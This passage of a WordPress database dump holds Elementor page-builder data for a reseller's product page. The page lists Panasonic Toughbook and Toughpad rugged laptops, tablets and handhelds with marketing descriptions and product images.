FZ-A2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb7e441\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_fz_a2_hero_front-1.png\",\"id\":2612}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"705b4b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>With the Android 6.0 (Marshmallow) operating system and Intel\\u00ae x5-Z8550 processor, the Panasonic TOUGHPAD\\u00ae A2 10.1-inch fully rugged Android\\u2122 tablet provides enterprise features and reliability miles ahead of consumer tablets. With the ability to be WWAN 4G LTE connected and a super-bright 800 NIT screen, it is the perfect solution for workers in the field. However demanding the job, the dependable TOUGHPAD\\u00a0FZ-A2 tablet is up to the task.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34adf46\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"46a580a\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-B2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3fc0690\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/prod-jtb2-hero.png\",\"id\":2613}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0fedb48\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The rugged, 7-inch Panasonic TOUGHPAD\\u00ae FZ-B2, now powered by Android\\u2122 6.0.1 (Marshmallow) and the latest Intel\\u00ae AtomTM x5-Z8550 processor is an easy-to-use, enterprise-grade productivity booster that works rain or shine. With durability, power and a range of configuration options \\u2013 at a price within reach of any business \\u2013 the TOUGHPAD\\u00a0FZ-B2 features a faster CPU, upgraded rear camera and Wi-Fi chipset, a quick-charging, user-replaceable full-shift battery and a Near Field Communications option. With a fully rugged and sealed design, the thin and lightweight TOUGHPAD\\u00a0FZ-B2 is built for long-lasting durability where others fail.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3663,2680,'_elementor_version','0.4'),(3673,2682,'_elementor_edit_mode','builder'),(3666,2681,'_elementor_edit_mode','builder'),(3667,2681,'_elementor_template_type','post'),(3668,2681,'_wp_page_template','template-fullwidth.php'),(3669,2681,'_elementor_data','[{\"id\":\"292e187\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"19fa744\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9d3051\",\"elType\":\"widget\",\"settings\":{\"title\":\"Computer Toughbook\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"18d10b9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"330ac40\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"52bc26e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 33\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e3edb98\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_33_hero.png\",\"id\":2594}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2aad3d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 33 is the first fully-rugged 2-in-1 of its kind\\u2014redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\\\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboards\\u2014TOUGHBOOK 33 is built for maximum mobility.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6e91208\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":43},\"elements\":[{\"id\":\"be86921\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 31\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5da701a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb31_win10.jpg\",\"id\":2593}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4dfcd25\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<header class=\\\"product-details__header\\\"><\\/header><div class=\\\"buttons-bar product-details__dealers\\\"><span style=\\\"color: #333333; font-family: Raleway, Helvetica, Arial, sans-serif; font-size: 15px; font-weight: bold; letter-spacing: 2px; text-transform: uppercase;\\\">PRODUCT DETAILS<\\/span><\\/div><div class=\\\"product-details__description\\\"><div class=\\\"field field--name-field-product-details field--type-text-long field--label-above\\\"><div class=\\\"field__item\\\"><p>Panasonic presents the TOUGHBOOK\\u00ae 31, the reliable laptop offering\\u00a0the world\\u2019s most rugged design. With drop-shock protection and a\\u00a0MIL-STD-810G certification, it\\u2019s the undisputed leader in the fully\\u00a0rugged category. Its Intel\\u00ae Core\\u2122 i5 processor packs a punch and it delivers amazing battery life\\u201419.5 hours, or 29 hours with the optional media bay\\u00a02nd battery. Combine six generations of delivering rugged performance\\u00a0plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div><\\/div><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bb47d1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9db1fee\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 54\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"15ce475\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_54_hero.png\",\"id\":2595}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6a00781\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>A semi-rugged 14\\u201d laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen Intel\\u00ae processors running Windows\\u00ae 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3bc7e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f01603d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"75026de\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"c5649b0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"1a9a32a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c925bd0\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 20\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b619a0\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/20mk2_laptop_right_angle_detached-1.jpg\",\"id\":2596}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9e46753\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\\\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5c9e08f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"830958b\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-Q2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4d72a50\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/toughpad-q2-hero.png\",\"id\":2597}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f07ddc4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>From the industry leader in reliability comes the Panasonic TOUGHPAD\\u00ae FZ-Q2 12.5-inch 2-in-1 Windows\\u00ae 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"816152c\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"488a087\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fb85606\",\"elType\":\"widget\",\"settings\":{\"title\":\"Handhelds\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fda2a67\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"b29f967\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b63ad5d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"711ad8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"68ee5f8\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"32bd399\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b342b76\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK T1\",\"header_size\":\"h4\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"284c9f7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-t1_image1-1_ss_1.jpg\",\"id\":2601}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8fca4ad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae\\u00a0T1 is a slim and sleek Android OS based handheld that proudly carries the TOUGHBOOK\\u00a0name. Its ability to be used in the enterprise to collect information from workers in retail stores, warehouses field service, transportation and delivery or many other environments where work must occur belies its mild looking exterior. The FZ-T1 has a quad-core processor and a straight-shooting barcode reader, options to have a pistol grip with trigger, use a stylus pen or connect to multi-carrier 4G LTE with voice capability, yet end users will feel comfortable with its Android OS. This handheld\'s users won\\u2019t miss a beat with its great battery life, glove and rain touch enabled 5\\\" screen, 5 foot drop rating and IP66 and IP68 certification.\\u00a0 The TOUGHBOOK\\u00a0T1 is ready to be used by satisfied end users everywhere in your organization.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c1dba18\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":60},\"elements\":[{\"id\":\"ed06566\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK N1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"57df093\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-n1_mk2_android_image_2_1.jpg\",\"id\":2604}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"380b880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae N1 \\u2014 a powerful, slim and fully rugged handheld. It\\u2019s the all-in-one tool you\\u2019ve been waiting for, and it\\u2019s ideal for where work takes you each day. With an octa-core processor, angled rear-facing barcode reader, optional stylus pen, and long-lasting battery that is warm-swappable; you won\\u2019t miss a beat. And when a flexible device is in demand, the TOUGHBOOK N1 delivers the Android\\u2122 operating system,\\u00a0giving you the ability to develop in an open environment with thousands of enterprise grade applications at your fingertips from the Google Play store or Panasonic\'s partners: independent software vendors (ISVs) and resellers\\/integrators. Plus, with built-in multi-carrier 4G LTE, voice capabilities, and dual SIM cards, the TOUGHBOOK N1 is ready to go where business takes you. And if it takes a seven-foot drop, don\\u2019t worry \\u2014 it can handle it, making it the choice for unrelenting conditions. So take it to work. It can take it.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6aba493\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3256f2d\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-X1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b370c19\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/236380_F1X1_Hero.png\",\"id\":2603}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1efa495\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The TOUGHPAD\\u00ae FZ-X1 is the world\'s most rugged 5-inch tablet and a whole lot more. For the first time, you can pair military-grade toughness and enterprise-class mobile computing power with Android-powered 4G data and voice services. Now field staff in the most demanding environments can have all the computing power they need in a handheld tablet small enough to drop in a pocket. Built on the flexible, secure Android 5.1.1 OS, the FZ-X1 lets businesses leverage their existing investments in enterprise applications without sacrificing performance and ruggedness. And it is seriously rugged.\\u00a0Thirty minutes of under five feet of water rugged.\\u00a0Ten foot drops onto solid concrete rugged. Built-in heater for -4\\u00b0 F weather rugged. Whether you throw it in a toolbox or literally take it into battle, the FZ-X1 can handle whatever comes its way.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"645131d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5ec8bc5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cea0ebe\",\"elType\":\"widget\",\"settings\":{\"title\":\"Tablets\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c92f938\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"bb0c96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e27fe8\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK L1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f6ee69c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-l1_right_ss.jpg\",\"id\":2609}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"636c2cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK L1 is a slim and sleek Android\\u2122 OS based\\u00a07\\\" tablet that proudly carries the TOUGHBOOK\\u00a0name. Its ability to be used\\u00a0in the enterprise to collect information from workers in retail stores,\\u00a0warehouses field service, transportation and delivery or many other\\u00a0environments where work must occur belies its mild looking exterior.\\u00a0The TOUGHBOOK L1 has a quad-core processor and optional straight-shooting\\u00a0barcode reader from portrait to landscape, use a stylus pen or connect\\u00a0to multi-carrier 4G LTE and provide the ease of use of the Andorid OS.\\u00a0This tablet\\u2019s users won\\u2019t miss a beat with its great battery life, glove and\\u00a0rain touch enabled 7\\\" screen, 5 foot drop rating and IP65 and IP67\\u00a0certification. The TOUGHBOOK L1 is ready to be used by satisfied end\\u00a0users everywhere in your organization.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d16c223\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ba5591e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-M1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ca8b0be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-m1_image_01_new_win10.jpg\",\"id\":2610}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"30fc1f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic FZ-M1 is the fully rugged Windows\\u00ae tablet, built to\\u00a0enable mission-critical mobile worker productivity without compromise. Powered\\u00a0by Windows\\u00ae 10 Pro, the FZ-M1 features a long life, user-replaceable\\u00a0battery and a daylight-readable, high-sensitivity multi-touch display for use\\u00a0with heavy gloves. With the broadest range of configuration options available in\\u00a0its class, the highly customizable FZ-M1 is the ideal tool for today\\u2019s\\u00a0mobile workforce. In addition to the highly configurable options, added models\\u00a0of Thermal Camera, Real Sense Camera, RTK\\/GPS, as well as several more.\\u00a0Allows the FZ-M1 to be the most comprehensive 7\\\" tablet in the market.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ddfa1b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4648e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-G1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ca5913e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-g1mk5_us_image02_ss.jpg\",\"id\":2611}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"a32d55e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The FZ-G1 Windows 10 Pro tablet offers a fluid user experience\\u00a0while providing crucial port connectivity and feature-rich options in a compact\\u00a0size. Designed for highly mobile field workers, it\\u2019s the thinnest and lightest\\u00a0fully rugged 10.1\\\" tablet running Windows 10 Pro 64-Bit. Powered by an\\u00a0Intel\\u00ae Core\\u2122 i5 vPro\\u2122 processor with a MIL-STD-810G and IP65 certified, the FZ-G1 Windows 10 tablet leads the way in rugged mobile\\u00a0computing. Add to that an HD daylight-readable 10-point gloved multi touch +\\u00a0waterproof digitizer pen, and it becomes an essential tool for field workers.\\u00a0With added Thermal camera and IR camera options.\\u00a0 Can also support \\\"Windows Hello\\\" for enhanced security.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d7ecd2\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ae2a70d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b56dd64\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-A2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb7e441\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_fz_a2_hero_front-1.png\",\"id\":2612}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"705b4b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>With the Android 6.0 (Marshmallow) operating system and Intel\\u00ae x5-Z8550 processor, the Panasonic TOUGHPAD\\u00ae A2 10.1-inch fully rugged Android\\u2122 tablet provides enterprise features and reliability miles ahead of consumer tablets. With the ability to be WWAN 4G LTE connected and a super-bright 800 NIT screen, it is the perfect solution for workers in the field. However demanding the job, the dependable TOUGHPAD\\u00a0FZ-A2 tablet is up to the task.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34adf46\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"46a580a\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-B2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3fc0690\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/prod-jtb2-hero.png\",\"id\":2613}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0fedb48\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The rugged, 7-inch Panasonic TOUGHPAD\\u00ae FZ-B2, now powered by Android\\u2122 6.0.1 (Marshmallow) and the latest Intel\\u00ae AtomTM x5-Z8550 processor is an easy-to-use, enterprise-grade productivity booster that works rain or shine. With durability, power and a range of configuration options \\u2013 at a price within reach of any business \\u2013 the TOUGHPAD\\u00a0FZ-B2 features a faster CPU, upgraded rear camera and Wi-Fi chipset, a quick-charging, user-replaceable full-shift battery and a Near Field Communications option. With a fully rugged and sealed design, the thin and lightweight TOUGHPAD\\u00a0FZ-B2 is built for long-lasting durability where others fail.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3670,2681,'_elementor_version','0.4'),(3675,2682,'_wp_page_template','template-fullwidth.php'),(3676,2682,'_elementor_data','[{\"id\":\"292e187\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"19fa744\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9d3051\",\"elType\":\"widget\",\"settings\":{\"title\":\"Computer Toughbook\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"18d10b9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"330ac40\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"52bc26e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 33\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e3edb98\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_33_hero.png\",\"id\":2594}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2aad3d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\"><strong>PRODUCT<\\/strong> DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 33 is the first fully-rugged 2-in-1 of its kind\\u2014redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\\\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboards\\u2014TOUGHBOOK 33 is built for maximum mobility.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6e91208\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":45},\"elements\":[{\"id\":\"be86921\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 